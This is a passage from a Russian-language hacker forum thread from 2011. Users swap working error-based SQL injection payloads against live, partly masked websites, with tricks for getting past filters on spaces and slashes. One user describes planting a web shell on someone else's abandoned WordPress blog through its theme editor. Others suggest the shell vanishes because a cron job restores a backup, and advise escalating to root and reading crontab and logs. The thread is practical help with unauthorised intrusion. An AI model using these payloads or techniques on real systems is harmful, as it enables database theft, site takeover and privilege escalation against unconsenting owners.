Старый 26.03.2011, 18:06   #921
Ctacok
 
Аватар для Ctacok
 
Регистрация: 06.07.2010
Сообщений: 127
Репутация: 49
По умолчанию

Цитата:
Сообщение от Tim Посмотреть сообщение
если запрещены пробелы, слеши,и прочее, есть ли возможность использовать limit?
limit 1 - пробел строго обязателен, не могу придумать как обойти
https://rdot.org/forum/showthread.php?t=60
__________________
Twitter - @Ctacok
Ctacok вне форума   Ответить с цитированием
Старый 26.03.2011, 18:57   #922
Tim
 
Аватар для Tim
 
Регистрация: 24.03.2011
Сообщений: 59
Репутация: 3
По умолчанию

Цитата:
Сообщение от Ctacok Посмотреть сообщение
https://rdot.org/forum/showthread.php?t=60
этот материал был первым делом изучен, все способы из него перепробованы.
суть проблемы: есть SQLi blind
MySQL 5.1.56
в запросе нельзя использовать / + %
символы %2B, %20, %09, %0d ,%0А, + в скрипте видимо не проходят через urldecode, и попадая в запрос вызывают синтаксическую ошибку

работает вывод в ошибке
Код:
http://www.site.com/path/url1'and(extractvalue(1,concat(0x3a,(select(user())))))and'1/
а вот
Код:
http://www.site.com/path/url1'and(extractvalue(1,concat(0x3a,(select(table_name)from(information_schema.tables)))))and'1/
выдает
Цитата:
Reason: Subquery returns more than 1 row
т.е нужен LIMIT
Tim вне форума   Ответить с цитированием
Старый 26.03.2011, 20:09   #923
S00pY
 
Аватар для S00pY
 
Регистрация: 05.07.2010
Сообщений: 39
Репутация: 35
По умолчанию

group_concat можно например

Щас сек проверю))

Живым примером:
Цитата:
***.com/show.php?num=(577)and(extractvalue(1,concat(0x3a,( select(group_concat(table_name))from(information_s chema.tables)where(table_name)>'CHARACTER_SETS'))) )--+

Последний раз редактировалось Twost; 16.05.2013 в 09:11..
S00pY вне форума   Ответить с цитированием
Старый 26.03.2011, 20:26   #924
Tim
 
Аватар для Tim
 
Регистрация: 24.03.2011
Сообщений: 59
Репутация: 3
По умолчанию

вот это уже что-то! только > тоже не подходит, т.к. в запрос попадает %3E
like надо как-то заюзать, вот только
where(table_name)like'user%'
перехватывает nginx
Цитата:
400 Bad Request
Нашел
and(extractvalue(1,concat(0x3a,(select(mid(group_c oncat(table_name),100,1024))from(information_schem a.tables)))))
Tim вне форума   Ответить с цитированием
Старый 27.03.2011, 17:14   #925
Rita Dees
 
Регистрация: 21.03.2011
Сообщений: 7
Репутация: 0
По умолчанию

Добрый день.

wp 2.3.3
Заливаю шелл через редактор тем(заменяю код любого пхп-файла на код шелла), сохраняю - все работает.

Захожу через день(и так уже 3 сутки), шелла нет! Как и файла, код которого я заменила.
Если залить второй и т.д. шелл в другие папки, то через сутки(вообщем на следующее утро) этот файл уже не найти.

Другой админ ничего не трогает и не удаляет, т.к. блог забыт так и не открывшись...
Rita Dees вне форума   Ответить с цитированием
Старый 27.03.2011, 19:07   #926
Vollkorn
 
Регистрация: 24.03.2011
Сообщений: 16
Репутация: 5
По умолчанию

Rita Dees, нельзя быть на 100% уверенным в том, что этот блог никому, кроме Вас не нужен. Может какой-то недохакер получил админовские права и не хочет, чтобы другие заливали шелл. Без дополнительных сведений (что за блог, как давно, где он и т.д.) можно придумать кучу вариантов, почему исчезают шеллы.
Vollkorn вне форума   Ответить с цитированием
Старый 27.03.2011, 19:55   #927
Jokester
 
Аватар для Jokester
 
Регистрация: 01.07.2010
Сообщений: 250
Репутация: 155
По умолчанию

Rita Dees
По крону восстанавливается раз в сутки с бекапа скорее всего.
Мне встречалось на каком-то хостере такое что на один вызов шелл отрабатывал, и убивался, но это несколько иная ситуация
__________________
------------------
Jokester вне форума   Ответить с цитированием
Старый 27.03.2011, 22:31   #928
Rita Dees
 
Регистрация: 21.03.2011
Сообщений: 7
Репутация: 0
По умолчанию

Цитата:
Rita Dees, нельзя быть на 100% уверенным в том, что этот блог никому, кроме Вас не нужен. Может какой-то недохакер получил админовские права и не хочет, чтобы другие заливали шелл. Без дополнительных сведений (что за блог, как давно, где он и т.д.) можно придумать кучу вариантов, почему исчезают шеллы.
Я там вообще одна во всей таблице wp_users + пароль трижды измененный!
А блог никому не нужен потому, что дата последних обновлений папок и файлов в директориях совпадает со временем выхода версии 2.3.3 это во первых, а во вторых там не было создано ни одной темы...только установили блог и всё на этом!
Цитата:
По крону восстанавливается раз в сутки с бекапа скорее всего.
Мне встречалось на каком-то хостере такое что на один вызов шелл отрабатывал, и убивался, но это несколько иная ситуация
Это, я так поняла, никак не проверишь? Логи соответствующие я могу найти (средствами шелла)?
Rita Dees вне форума   Ответить с цитированием
Старый 28.03.2011, 04:36   #929
Tim
 
Аватар для Tim
 
Регистрация: 24.03.2011
Сообщений: 59
Репутация: 3
По умолчанию

раз там все так запущено, поднимай права до рута, и смотри что в кроне (crontab -l), да и логи изучить не лишним будет
Tim вне форума   Ответить с цитированием
Старый 28.03.2011, 06:55   #930
Rita Dees
 
Регистрация: 21.03.2011
Сообщений: 7
Репутация: 0
По умолчанию

Дата последнего обновления - ноябрь 2010 (2.6.28), где в открытом доступе под такое найдешь...
Rita Dees вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd. Перевод: zCarot